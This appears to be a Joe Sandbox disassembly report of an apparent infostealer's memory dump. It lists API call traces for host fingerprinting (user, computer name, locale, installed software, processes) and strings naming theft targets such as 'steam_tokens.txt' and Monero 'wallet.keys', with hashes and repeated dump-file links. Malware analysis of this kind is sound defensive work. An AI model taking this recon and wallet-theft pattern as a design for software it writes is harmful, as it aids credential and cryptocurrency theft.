Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Part of subcall function 00827500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00827542
Part of subcall function 00827500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0082757F
Part of subcall function 00827500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827603
Part of subcall function 00827500: RtlAllocateHeap.NTDLL(00000000), ref: 0082760A

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 00827690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008276A4
Part of subcall function 00827690: RtlAllocateHeap.NTDLL(00000000), ref: 008276AB

Part of subcall function 008277C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0082DBC0,000000FF,?,00821C99,00000000,?,00EFD018,00000000,?), ref: 008277F2
Part of subcall function 008277C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0082DBC0,000000FF,?,00821C99,00000000,?,00EFD018,00000000,?), ref: 008277F9

Part of subcall function 00827850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008111B7), ref: 00827880
Part of subcall function 00827850: RtlAllocateHeap.NTDLL(00000000), ref: 00827887
Part of subcall function 00827850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0082789F

Part of subcall function 008278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827910
Part of subcall function 008278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00827917
Part of subcall function 008278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0082792F

Part of subcall function 00827980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00830E00,00000000,?), ref: 008279B0
Part of subcall function 00827980: RtlAllocateHeap.NTDLL(00000000), ref: 008279B7
Part of subcall function 00827980: GetLocalTime.KERNEL32(?,?,?,?,?,00830E00,00000000,?), ref: 008279C4
Part of subcall function 00827980: wsprintfA.USER32 ref: 008279F3

Part of subcall function 00827A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00EFDF38,00000000,?,00830E10,00000000,?,00000000,00000000), ref: 00827A63
Part of subcall function 00827A30: RtlAllocateHeap.NTDLL(00000000), ref: 00827A6A
Part of subcall function 00827A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00EFDF38,00000000,?,00830E10,00000000,?,00000000,00000000,?), ref: 00827A7D

Part of subcall function 00827B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00EFDF38,00000000,?,00830E10,00000000,?,00000000,00000000), ref: 00827B35

Part of subcall function 00827B90: GetKeyboardLayoutList.USER32(00000000,00000000,008305AF), ref: 00827BE1
Part of subcall function 00827B90: LocalAlloc.KERNEL32(00000040,?), ref: 00827BF9
Part of subcall function 00827B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00827C0D
Part of subcall function 00827B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00827C62
Part of subcall function 00827B90: LocalFree.KERNEL32(00000000), ref: 00827D22

Part of subcall function 00827D80: GetSystemPowerStatus.KERNEL32(?), ref: 00827DAD

GetCurrentProcessId.KERNEL32(00000000,?,00EFD218,00000000,?,00830E24,00000000,?,00000000,00000000,?,00EFDE00,00000000,?,00830E20,00000000), ref: 0082207E

Part of subcall function 00829470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00829484
Part of subcall function 00829470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008294A5
Part of subcall function 00829470: CloseHandle.KERNEL32(00000000), ref: 008294AF

Part of subcall function 00827E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827E37
Part of subcall function 00827E00: RtlAllocateHeap.NTDLL(00000000), ref: 00827E3E
Part of subcall function 00827E00: RegOpenKeyExA.KERNEL32(80000002,00EEB818,00000000,00020119,?), ref: 00827E5E
Part of subcall function 00827E00: RegQueryValueExA.KERNEL32(?,00EFCFF8,00000000,00000000,000000FF,000000FF), ref: 00827E7F
Part of subcall function 00827E00: RegCloseKey.ADVAPI32(?), ref: 00827E92

Part of subcall function 00827F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00827FC9
Part of subcall function 00827F60: GetLastError.KERNEL32 ref: 00827FD8

Part of subcall function 00827ED0: GetSystemInfo.KERNEL32(00830E2C), ref: 00827F00
Part of subcall function 00827ED0: wsprintfA.USER32 ref: 00827F16

Part of subcall function 00828100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00EFDE48,00000000,?,00830E2C,00000000,?,00000000), ref: 00828130
Part of subcall function 00828100: RtlAllocateHeap.NTDLL(00000000), ref: 00828137
Part of subcall function 00828100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00828158
Part of subcall function 00828100: wsprintfA.USER32 ref: 008281AC

Part of subcall function 008287C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00830E28,00000000,?), ref: 0082882F
Part of subcall function 008287C0: RtlAllocateHeap.NTDLL(00000000), ref: 00828836
Part of subcall function 008287C0: wsprintfA.USER32 ref: 00828850

Part of subcall function 00828320: RegOpenKeyExA.KERNEL32(00000000,00EFB080,00000000,00020019,00000000,008305B6), ref: 008283A4

Part of subcall function 00828320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00828426
Part of subcall function 00828320: wsprintfA.USER32 ref: 00828459
Part of subcall function 00828320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0082847B
Part of subcall function 00828320: RegCloseKey.ADVAPI32(00000000), ref: 0082848C
Part of subcall function 00828320: RegCloseKey.ADVAPI32(00000000), ref: 00828499

Part of subcall function 00828680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008305B7), ref: 008286CA
Part of subcall function 00828680: Process32First.KERNEL32(?,00000128), ref: 008286DE
Part of subcall function 00828680: Process32Next.KERNEL32(?,00000128), ref: 008286F3
Part of subcall function 00828680: CloseHandle.KERNEL32(?), ref: 00828761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0082265B

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 60318822-0
Opcode ID: 440b10c0d32bfe05eacc460b5689960d3fe0e1db91155ff2b7287c2f7c8094d9
Instruction ID: 64bbffdb365a91891b6fb9db0559ca0e4ecd439d265d6338c4f175a538dc31d0
Opcode Fuzzy Hash: 440b10c0d32bfe05eacc460b5689960d3fe0e1db91155ff2b7287c2f7c8094d9
Instruction Fuzzy Hash: 84721C72910128ABDB1DFB94EC92DDE7778FF54300F5046A9F516A2052EF302B89CA67

Function 00816D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544fb46939c22099644fd1df3d85ce6ca75ec8222196c8757c5d90487a971596
Instruction ID: 77600115d7ff5c12429cafa02b4d83afc9e4e0f1c616a14e47c40709719750ec
Opcode Fuzzy Hash: 544fb46939c22099644fd1df3d85ce6ca75ec8222196c8757c5d90487a971596
Instruction Fuzzy Hash: 3E61F8B4900219DFCB14CF94E944BEEB7B8FF04304F208598E459A7280E775AEA5DF91

Function 008270D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0082718C

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-4138519520
Opcode ID: d57fe5e87124e7bf67cc4fb958bdb5b40eb2731c80ae02c85c3672b58f2cd2d2
Instruction ID: e8a48109bc2f6c9bb70a2179f96336feb04d0d11dad4de720d9d43d558175d48
Opcode Fuzzy Hash: d57fe5e87124e7bf67cc4fb958bdb5b40eb2731c80ae02c85c3672b58f2cd2d2
Instruction Fuzzy Hash: B1513DB0D042289BDB14EB95EC96BEEB374FF44304F5041A8E516B6181EB746AC8CF55

Function 00825100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A820: lstrlen.KERNEL32(00814F05,?,?,00814F05,00830DDE), ref: 0082A82B
Part of subcall function 0082A820: lstrcpy.KERNEL32(00830DDE,00000000), ref: 0082A885

lstrlen.KERNEL32(00000000,00000000,00830ACA), ref: 0082512A

Strings

steam_tokens.txt, xrefs: 0082513F

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: a50f61524f9142688c6ba8a6321e5452d8293c8d7f6722b7496c8be9ba90d7b6
Instruction ID: 87cd4427c412e277981634e5f6b85b7ad1dfb063903fb036ce9cdf7e4645d184
Opcode Fuzzy Hash: a50f61524f9142688c6ba8a6321e5452d8293c8d7f6722b7496c8be9ba90d7b6
Instruction Fuzzy Hash: 50F0E8719101286BCB08F7A8E8579ED733CFF54300F404268B557E2492EE24668986A7

Function 00827ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00830E2C), ref: 00827F00
wsprintfA.USER32 ref: 00827F16

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 6433f8cd93173455991a4521a8efa8d2ba1e04e66288c28bc2c75d0c8b193fd3
Instruction ID: 452305312ac4fb5cd44811a0155eb1d15cbd40a3a3c37fccf8c17c4564538269
Opcode Fuzzy Hash: 6433f8cd93173455991a4521a8efa8d2ba1e04e66288c28bc2c75d0c8b193fd3
Instruction Fuzzy Hash: 54F06DB1A04218EBCB10CF85EC45FAABBBCFB48B24F000669F515E2680D77969448BE1

Function 0081B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

lstrlen.KERNEL32(00000000), ref: 0081B9C2
lstrlen.KERNEL32(00000000), ref: 0081B9D6

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: b66a8249d58b55464ee5b571c638020aa83d0b43ac0c6967fbb0c24807d65fb4
Instruction ID: e51b8388b2a4d16cfff0e162c45c49fe279c68f7c3defd3a62dd031a8cb5671d
Opcode Fuzzy Hash: b66a8249d58b55464ee5b571c638020aa83d0b43ac0c6967fbb0c24807d65fb4
Instruction Fuzzy Hash: 4DE1E1729101289BDB08FBA4EC96DEE7378FF54300F404569F516E6191EF346A89CBA3

Function 0081AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

lstrlen.KERNEL32(00000000), ref: 0081B16A
